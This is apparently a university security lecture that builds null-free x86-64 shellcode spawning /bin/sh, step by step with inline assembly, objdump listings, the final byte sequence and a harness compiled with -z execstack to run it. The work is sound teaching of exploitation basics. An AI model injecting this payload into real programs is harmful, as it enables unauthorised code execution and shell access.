Warning

The code in this lecture must be tested in a pure Ubuntu machine or in a VM. It doesn't work in WSL.

Shellcode: Executing "/bin/sh" Program

A shellcode is the code that launchs a shell. In the lab, we will create code for setting up a reverse shell. Naturally, the adversary would like to inject this shellcode and have the target process run it; then the adversary will gain a shell.

In this lecture, as preparation for the lab, we will see how to create code that launches a local shell. For a starter, consider the following C code runthis.c. In the end, we want to create binary executable bytes that would do a similar task.


#include <unistd.h>
int main( ) 
{
    char* file = "/bin/sh";

    char* argv[2];
    argv[0] = file;
    argv[1] = 0;

    char** env = 0;

    execve(file, argv, env);
    return 0;
}
Recall that execve executes a program. See a man page.
$ gcc -g runthis.c -o runthis
$ ./runthis
$ exit 
$ 
Note that even if you exited, you still have a prompt. This is because you executed a shell command "bash"!

Shellcode

A shellcode is just the assembly version of the code calling execve("/bin/sh", ...) as above.

Shellcode Requirements

Since the shellcode should be injected as data into a target program, the following conditions should be met so that it may work fine:

Satisfying [REQ1]: Encoding the string "/bin/sh" into a number

Creating and storing a string need some creativity, We can do something like the following:
  • Encode the 5 byte string "bash" into an integer.
See the following python script (this should makes sense to you).

>>> s = b'/bin/sh\0'
>>> n = int.from_bytes(s, 'little')
>>> hex(n)
'0x68732f6e69622f'

Using inline assembly code


// trial1.c
#include <stdio.h>

int main( )
{
  asm("movabsq $0x68732f6e69622f, %rax");
  asm("push %rax");

  printf("a lot more to do...\n");
  return 0;
}
  • [create "/bin/sh"]: movabsq instruction.

    The part movabs means "move an absolute value", and the part q means a quad-word (8 byte number). This instruction puts our magic number into register rax.

  • [store it in memory]: push instruction.

    We push this string (held by rax) onto the stack.

The following GDB log confirms that our code works!
(gdb) l
1       // trial1.c
2       #include <stdio.h>
3
4       int main( )
5       {
6         asm("movabsq $0x68732f6e69622f, %rax");
7         asm("push %rax");
8
9         printf("a lot more to do...\n");
10        return 0;
(gdb) b 6
Breakpoint 1 at 0x63e: file trial1.c, line 6.
(gdb) r
Starting program: /mnt/c/choi0/02teaching/it432/lec/l15/trial1

Breakpoint 1, main () at trial1.c:6
6         asm("movabsq $0x68732f6e69622f, %rax");
(gdb) stepi
7         asm("push %rax");
(gdb) p/x $rax
$1 = 0x68732f6e69622f
(gdb) stepi
9         printf("a lot more to do...\n");
(gdb) hd $rsp 20
0x7ffffffee008: 2F 62 69 6E       / b i n
0x7ffffffee00c: 2F 73 68 00       / s h .
0x7ffffffee010: 60 06 00 08       ` . . .
0x7ffffffee014: 00 00 00 00       . . . .
0x7ffffffee018: F7 1B 02 FF       . . . .
It will be easier to understand the above if you remember that stepi executes the instruction shown right above.
  • The first stepi executes line 6, i.e., moveabsq
  • The second stepi executes line 7, i.e., push.

Meeting [REQ2]

Now, let's see how these assembly instructions are translated into actual binary bytes. The objdump is useful here.
$ objdump -d trial1
...
000000000000063a <main>:
 63a:   55                      push   %rbp
 63b:   48 89 e5                mov    %rsp,%rbp
 63e:   48 b8 2f 62 69 6e 2f    movabs $0x68732f6e69622f,%rax
 645:   73 68 00
 648:   50                      push   %rax 
 649:   48 8d 3d 94 00 00 00    lea    0x94(%rip),%rdi        # 6e4 <_IO_stdin_used+0x4>
 650:   e8 bb fe ff ff          callq  510 <puts@plt>
 655:   b8 00 00 00 00          mov    $0x0,%eax
 65a:   5d                      pop    %rbp
 65b:   c3                      retq
Unfortunately, we have a problem here. The last byte for the movabs instruction is 00. It is not injectable! It turns out that our magic number is 0x0068732f6e69622f with a full 8-byte representation.

Fix: xor two numbers

We fix this problem using xor. That is, choose two 8-byte number a and b (with no 0x00 anywhere to satisfy [REQ2]) such that As shown in the python script below, I chose a = 0x11....11 for convenience. Then, we can easily find b.

>>> n = 0x68732f6e69622f
>>> a = 0x1111111111111111
>>> b = a ^ n  # a xor n
>>> hex(b)
'0x1179623e7f78733e'

Pushing "/bin/sh" to the stack

Therefore, we can write the code as follows.

asm("movabsq $0x1111111111111111, %rax");
asm("movabsq $0x1179623e7f78733e, %rbx"); 
asm("xor %rbx, %rax");    // %rax ← %rbx xor %rax
asm("push %rax");

Passing Arguments Into the execve() Function

As you can see from the reference, in x86-64, we use the following registers for passing arguments.
  • First argument: rdi
  • Second argument: rsi
  • Third argument: rdx

First argument: set rdi

Recall that the first argument is the address of "/bin/sh". Since we just pushed the "/bin/sh" on to the stack, $rsp is actually the location of the string. So, we set %rdi ← %rsp.

asm("mov %rsp, %rdi")  // %rdi ← %rsp

#include <unistd.h>
int main( ) 
{
    char* file = "/bin/sh";

    char* argv[2];
    argv[0] = file;
    argv[1] = 0;

    char** env = 0;

    execve(file, argv, env);
    return 0;
}

Second argument: set rsi

The second argument is env. Since it has two entries, we first push two objects on the stack (as the array elements of env).
Note:
  1. The 2nd element argv[1] is 0. So, push 0. You cannot use 0 directly, which would violate [REQ2]. As before, we use the xor trick.
    
    asm("xor %rax, %rax");    // xor trick; %rax ← 0
    asm("push %rax");         // push 0
    
  2. The 1st element argv[0] is the location of "/bin/sh". Luckily, rdi has it! So, we just push the value of rdi on the stack.
    
    asm("push %rdi");     // rdi has the location of "/bin/sh"
    
  3. Now, we can finally set rsi for the second argument arg to execve. Since we just pushed the array contents of env, the location of env is again the top of the stack, This means we can just do %rsi ← %rsp
    
    asm("mov %rsp, %rsi");  // %rsi ← %rsp
    

Third argument: set rdx

The third argument env can be set to 0. That is, we can set rdx to 0.

asm("xor %rdx, %rdx");  // %rdx ← 0

Calling execve in Assembly

Now, we are ready to call our function execve. The function is indeed a system call. See the syscall table in the github page of Linus Torvalds.
The index for exeve in the syscall table is 59.
This is a way to do a system call:
  1. Have rax contain the right index for the system call (i.e., 59 in our case).
    
    asm("mov $59, %rax"); 
    
  2. Run syscall instruction.
    
    asm("syscall");
    

The Overall Code

// trial2.c
#include <stdio.h>

int main( )
{
  // first argument: rdi
  asm("movabsq $0x1111111111111111, %rax");
  asm("movabsq $0x1179623e7f78733e, %rbx"); 
  asm("xor %rbx, %rax");
  asm("push %rax");
  asm("mov %rsp, %rdi");

  // second argument: rsi 
  asm("xor %rax, %rax");
  asm("push %rax");
  asm("push %rdi");
  asm("mov %rsp, %rsi");

  // third argumet: rdx
  asm("xor %rdx, %rdx");

  // execve
  asm("mov  $59, %rax");
  asm("syscall");

  return 0;
}
It works like a charm!
$ gcc trial2.c -o trial2
$ ./trial2
$ exit

[REQ2] Check: Oops in the last mov instruction

$ objdump -d trial2
00000000000005fa <main>:
 5fa:   55                      push   %rbp
 5fb:   48 89 e5                mov    %rsp,%rbp
 5fe:   48 b8 11 11 11 11 11    movabs $0x1111111111111111,%rax
 605:   11 11 11
 608:   48 bb 3e 73 78 7f 3e    movabs $0x1179623e7f78733e,%rbx
 60f:   62 79 11
 612:   48 31 d8                xor    %rbx,%rax
 615:   50                      push   %rax
 616:   48 89 e7                mov    %rsp,%rdi
 619:   48 31 c0                xor    %rax,%rax
 61c:   50                      push   %rax
 61d:   57                      push   %rdi
 61e:   48 89 e6                mov    %rsp,%rsi
 621:   48 31 d2                xor    %rdx,%rdx
 624:   48 c7 c0 3b 00 00 00    mov    $0x3b,%rax
 62b:   0f 05                   syscall
 62d:   b8 00 00 00 00          mov    $0x0,%eax
 632:   5d                      pop    %rbp
 633:   c3                      retq
 634:   66 2e 0f 1f 84 00 00    nopw   %cs:0x0(%rax,%rax,1)
 63b:   00 00 00
 63e:   66 90                   xchg   %ax,%ax

Fix

Fortunately, we can easily fix the problem as follows:

  // $rax contains 0 before this instruction due to xor %rax, %rax
  asm("mov  $59, %rax");  

  asm("mov  $59, %al");
As shown in the reference, %al is the last 8-bit of %rax. Since %rax contains 0 at the moment, changing %al to 59 will lead to changing %rax to 59.

Final Shellcode

Source code: trial2.c.
$ objdump -d trial2
00000000000005fa <main>:
 5fa:   55                      push   %rbp
 5fb:   48 89 e5                mov    %rsp,%rbp
 5fe:   48 b8 11 11 11 11 11    movabs $0x1111111111111111,%rax
 605:   11 11 11
 608:   48 bb 3e 73 78 7f 3e    movabs $0x1179623e7f78733e,%rbx
 60f:   62 79 11
 612:   48 31 d8                xor    %rbx,%rax
 615:   50                      push   %rax
 616:   48 89 e7                mov    %rsp,%rdi
 619:   48 31 c0                xor    %rax,%rax
 61c:   50                      push   %rax
 61d:   57                      push   %rdi
 61e:   48 89 e6                mov    %rsp,%rsi
 621:   48 31 d2                xor    %rdx,%rdx
 624:   b0 3b                   mov    $0x3b,%al
 626:   0f 05                   syscall
 628:   b8 00 00 00 00          mov    $0x0,%eax
 62d:   5d                      pop    %rbp
 62e:   c3                      retq
48 b8 11 11 11 11 11 11 11 11
48 bb 3e 73 78 7f 3e 62 79 11
48 31 d8 
50 
48 89 e7  
48 31 c0
50 
57 
48 89 e6
48 31 d2
b0 3b
0f 05 
The above is stored in shtxtcode.txt
We can run the following python script to get the binary bytes. You need to understand what's going on here.

# genshcode.py
s = open("shtxtcode.txt").read().split()
shellcode = bytes([int(s[i],16) for i in range(len(s))])
open("sc.bin", "wb").write(shellcode)
The final shell code is shown below:
$ python3 genshcode.py
$ hexdump -C sc.bin
00000000  48 b8 11 11 11 11 11 11  11 11 48 bb 3e 73 78 7f  |H.........H.>sx.|
00000010  3e 62 79 11 48 31 d8 50  48 89 e7 48 31 c0 50 57  |>by.H1.PH..H1.PW|
00000020  48 89 e6 48 31 d2 b0 3b  0f 05                    |H..H1..;..|
0000002a

Injectable?

Yes!

>>> shcode = open("sc.bin", "rb").read()
>>> injectable(shcode)
True

Let's Test the ShellCode!


// runthis2.c 

int main()
{
   // read the shell code into data
   char data[256];
   FILE* fin = fopen("sc.bin", "rb");
   fread(data, sizeof(char), 256, fin);
   fclose(fin);

   void(*f)();                // Declare a variable f
                              //  f is a pointer to a function with prototype
                              //  void some_func_name ();  

   f = (void(*)()) data;   // The pointer f now points to data (shellcode)

   f();                       // call f:
                              //  since f points to the shellcode, 
                              //  the shellocode will be executed as a function!

    return 0;
}

Compile: -z execstack

For security, by default, any attempt to execute code on the stack will cause segmentation fault. To bypass this security measure of gcc, we add "-z execstack" option when compling runthis2.c This option allows the program to run the code that resides in the stack.
gcc -z execstack runthis2.c -o runthis2

Run!

$./runthis2 
$ exit
Tip: Checking the assembly instructions of the injected code.

GDB is not overly kind to show the assembly instructions of the injected code. However, it provides a command that allows us to do so. Whenever you want to check the current assembly instruction, you can run the following command:

x/i $rip